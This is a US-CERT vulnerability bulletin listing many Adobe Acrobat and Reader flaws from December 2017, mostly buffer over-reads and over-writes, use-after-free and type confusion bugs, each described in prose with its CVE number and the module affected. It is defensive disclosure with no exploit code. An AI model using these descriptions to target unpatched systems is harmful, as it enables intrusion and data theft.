Entries may include additional information provided by organizations and efforts sponsored by US-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of US-CERT analysis.


High Vulnerabilities

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info
There were no high vulnerabilities recorded this week.


Medium Vulnerabilities

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info
There were no medium vulnerabilities recorded this week.


Low Vulnerabilities

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info
There were no low vulnerabilities recorded this week.


Severity Not Yet Assigned

Primary
Vendor -- Product
DescriptionPublishedCVSS ScoreSource & Patch Info
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the image conversion module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16382
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is a result of untrusted input that is used to calculate an array index; the calculation occurs in the printing functionality. The vulnerability leads to an operation that can write to a memory location that is outside of the memory addresses allocated for the data structure. The specific scenario leads to a write access to a memory location that does not belong to the relevant process address space.2017-12-09not yet calculatedCVE-2017-16391
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer over-read in the JPEG 2000 module. An invalid JPEG 2000 input code stream leads to a computation where the pointer arithmetic results in a location outside valid memory locations belonging to the buffer. An attack can be used to obtain sensitive information, such as object heap addresses, etc.2017-12-09not yet calculatedCVE-2017-16374
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a computation that writes data past the end of the intended buffer; the computation is part of the XPS to PDF conversion module, when processing TIFF files. The vulnerability is a result of an out of range pointer offset that is used to access sub-elements of an internal data structure. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code.2017-12-09not yet calculatedCVE-2017-16413
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the JavaScript engine. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.2017-12-09not yet calculatedCVE-2017-16393
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The issue is a stack exhaustion problem within the JavaScript API, where the computation does not correctly control the amount of recursion that can happen with respect to system resources.2017-12-09not yet calculatedCVE-2017-16419
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the JavaScript engine API. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.2017-12-09not yet calculatedCVE-2017-16390
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the WebCapture module, related to an internal hash table implementation. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16411
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the JavaScript API engine. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.2017-12-09not yet calculatedCVE-2017-16388
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of Acrobat's page display functionality. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16405
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the JavaScript API module responsible for form field computation. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16414
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer access with an incorrect length value when processing TIFF files embedded within an XPS document. Crafted TIFF image input causes a mismatch between allocated buffer size and the access allowed by the computation. If an attacker can adequately control the accessible memory then this vulnerability can be leveraged to achieve arbitrary code execution.2017-12-09not yet calculatedCVE-2017-16381
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a heap overflow vulnerability when processing a JPEG file embedded within an XPS document.2017-12-09not yet calculatedCVE-2017-16383
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer over-read in the exif processing module for a PNG file (during XPS conversion). Invalid input leads to a computation where pointer arithmetic results in a location outside valid memory locations belonging to the buffer. An attack can be used to obtain sensitive information, such as object heap addresses, etc.2017-12-09not yet calculatedCVE-2017-16384
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a type confusion overflow vulnerability in the graphics rendering engine.2017-12-09not yet calculatedCVE-2017-16379
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to an untrusted pointer dereference when handling number format dictionary entries. In this scenario, the input is crafted in way that the computation results in pointers to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result in sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16364
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a security bypass vulnerability for a certain file-type extension. Acrobat maintains both a blacklist and whitelist (the user can specify an allowed attachment). However, any file extensions that are neither on the blacklist nor the whitelist can still be opened after displaying a warning prompt.2017-12-09not yet calculatedCVE-2017-16380
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer over-read in the module that handles character codes for certain textual representations. Invalid input leads to a computation where the pointer arithmetic results in a location outside valid memory locations belonging to the buffer. An attack can be used to obtain sensitive information, such as object heap addresses, etc.2017-12-09not yet calculatedCVE-2017-16363
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the MakeAccessible plugin. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16376
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to an untrusted pointer dereference in the JavaSscript API engine. In this scenario, the JavaScript input is crafted in way that the computation results in pointers to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result in sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16375
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer access with an incorrect length value in the TIFF processing module. Crafted input causes a mismatch between allocated buffer size and the access allowed by the computation. If an attacker can adequately control the accessible memory then this vulnerability can be leveraged to achieve arbitrary code execution.2017-12-09not yet calculatedCVE-2017-16396
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of an out of bounds read vulnerability in the MakeAccesible plugin, when handling font data. It causes an out of bounds memory access, which sometimes triggers an access violation exception. Attackers can exploit the vulnerability by using the out of bounds access for unintended reads, writes, or frees, potentially leading to code corruption, control-flow hijack, or an information leak attack.2017-12-09not yet calculatedCVE-2017-16362
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is due to a computation that accesses a pointer that has not been initialized; the computation occurs during internal AST thread manipulation. In this case, a computation defines a read from an unexpected memory location. Therefore, an attacker might be able to read sensitive portions of memory.2017-12-09not yet calculatedCVE-2017-16378
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the XPS2PDF conversion engine. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16386
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a Same Origin Policy security bypass vulnerability, affecting files on the local system, etc.2017-12-09not yet calculatedCVE-2017-16369
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is due to a computation that accesses a pointer that has not been initialized in the main DLL. In this case, a computation defines a read from an unexpected memory location. Therefore, an attacker might be able to read sensitive portions of memory.2017-12-09not yet calculatedCVE-2017-16377
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a type confusion overflow vulnerability. The vulnerability leads to an out of bounds memory access. Attackers can exploit the vulnerability by using the out of bounds access for unintended reads or writes -- potentially leading to code corruption, control-flow hijack, or an information leak attack.2017-12-09not yet calculatedCVE-2017-16367
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to an untrusted pointer dereference in the JavaScript engine. In this scenario, the input is crafted in a way that the computation results in pointers to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result in sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16371
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to untrusted pointer dereference in the JavaScript API engine. In this scenario, the JavaScript input is crafted in way that the computation results with pointer to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result with sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16372
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the Adobe graphics module responsible for displaying textual data. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16409
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs because of a computation that reads data that is past the end of the target buffer; the computation is a part of the JavaScript engine. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16370
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer over-read in the True Type2 Font parsing module. A corrupted cmap table input leads to a computation where the pointer arithmetic results in a location outside valid memory locations belonging to the buffer. An attack can be used to obtain sensitive information, such as object heap addresses, etc.2017-12-09not yet calculatedCVE-2017-16365
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a security bypass vulnerability in the AcroPDF plugin.2017-12-09not yet calculatedCVE-2017-16366
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability leads to a stack-based buffer overflow condition in the internal Unicode string manipulation module. It is triggered by an invalid PDF file, where a crafted Unicode string causes an out of bounds memory access of a stack allocated buffer, due to improper checks when manipulating an offset of a pointer to the buffer. Attackers can exploit the vulnerability and achieve arbitrary code execution if they can effectively control the accessible memory.2017-12-09not yet calculatedCVE-2017-16368
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer access with an incorrect length value in TIFF parsing during XPS conversion. Crafted TIFF image input causes a mismatch between allocated buffer size and the access allowed by the computation. If an attacker can adequately control the accessible memory then this vulnerability can be leveraged to achieve arbitrary code execution.2017-12-09not yet calculatedCVE-2017-16385
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader

 
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a security bypass vulnerability when handling XFDF files.2017-12-09not yet calculatedCVE-2017-16361
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to an untrusted pointer dereference in the XPS parsing module. In this scenario, the input is crafted in a way that the computation results in pointers to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result in sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16399
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a type confusion vulnerability in the EMF processing module. The issue causes the program to access an object using an incompatible type, leading to an out of bounds memory access. Attackers can exploit the vulnerability by using the out of bounds access for unintended reads, writes, or frees -- potentially leading to code corruption, control-flow hijack, or information leak attack.2017-12-09not yet calculatedCVE-2017-16406
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer access with an incorrect length value in the image conversion module when processing Enhanced Metafile Format (EMF). Crafted EMF input (EMR_STRETCHDIBITS) causes a mismatch between allocated buffer size and the access allowed by the computation. If an attacker can adequately control the accessible memory then this vulnerability can be leveraged to achieve arbitrary code execution.2017-12-09not yet calculatedCVE-2017-16395
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer access with an incorrect length value in the JPEG processing module. Crafted input with an unexpected JPEG file segment size causes a mismatch between allocated buffer size and the access allowed by the computation. If an attacker can adequately control the accessible memory then this vulnerability can be leveraged to achieve arbitrary code execution.2017-12-09not yet calculatedCVE-2017-16392
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a computation that writes data past the end of the intended buffer; the computation is part of the image conversion module that handles Enhanced Metafile Format Plus (EMF+) data. The vulnerability is a result of an out of range pointer offset that is used to access sub-elements of an internal data structure. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code.2017-12-09not yet calculatedCVE-2017-16416
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is in the part of the JavaScript engine that handles annotation abstraction. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16420
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a computation that writes data past the end of the intended buffer; the computation is a part of the functionality that handles font encodings. The vulnerability is a result of out of range pointer offset that is used to access sub-elements of an internal data structure. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code.2017-12-09not yet calculatedCVE-2017-16415
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the image conversion module that processes Enhanced Metafile Format Plus (EMF+) data. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-16403 | Sources: SECTRACK, CONFIRM

adobe -- acrobat_and_reader
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the image conversion module that handles XPS files. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-16418 | Sources: SECTRACK, CONFIRM

adobe -- acrobat_and_reader
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the font parsing module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-16417 | Sources: SECTRACK, CONFIRM

adobe -- acrobat_and_reader
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the JavaScript engine. The mismatch between an old and a new object can provide an attacker with unintended memory access. Successful exploitation could lead to arbitrary code execution.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-16389 | Sources: BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a computation that writes data past the end of the intended buffer; the computation is part of processing Enhanced Metafile Format Plus (EMF+). The vulnerability is a result of an out of range pointer offset that is used to access sub-elements of an internal data structure. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-16404 | Sources: SECTRACK, CONFIRM

adobe -- acrobat_and_reader
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the JPEG 2000 module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-16402 | Sources: SECTRACK, CONFIRM

adobe -- acrobat_and_reader
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the JavaScript engine. The mismatch between an old and a new object can provide an attacker with unintended memory access, potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-16398 | Sources: BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs because of a computation that reads data that is past the end of the target buffer; the computation is part of the XPS conversion module, when handling a JPEG resource. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-16412 | Sources: SECTRACK, CONFIRM

adobe -- acrobat_and_reader
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the WebCapture module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-16394 | Sources: SECTRACK, CONFIRM

adobe -- acrobat_and_reader
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the JPEG 2000 parser. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-16400 | Sources: SECTRACK, CONFIRM

adobe -- acrobat_and_reader
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to an untrusted pointer dereference. In this scenario, the input is crafted in a way that the computation results in pointers to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result in sensitive data exposure.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-16373 | Sources: BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the MakeAccessible plugin, when creating an internal data structure. The mismatch between an old and a new object can provide an attacker with unintended memory access, potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-16360 | Sources: BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is a result of untrusted input that is used to calculate an array index; the calculation occurs in the image conversion module, when processing GIF files. The vulnerability leads to an operation that can write to a memory location that is outside of the memory addresses allocated for the data structure. The specific scenario leads to a write access to a memory location that does not belong to the relevant process address space.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-16410 | Sources: BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of Enhanced Metafile Format (EMF) processing within the image conversion module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-16397 | Sources: SECTRACK, CONFIRM

adobe -- acrobat_and_reader
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a computation that writes data past the end of the intended buffer; the computation is part of handling an EMF EMR_BITBLT record. The vulnerability is a result of an out of range pointer offset that is used to access sub-elements of an internal data structure. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-16407 | Sources: BID, SECTRACK, CONFIRM

adobe -- acrobat_and_reader
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the WebCapture module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.
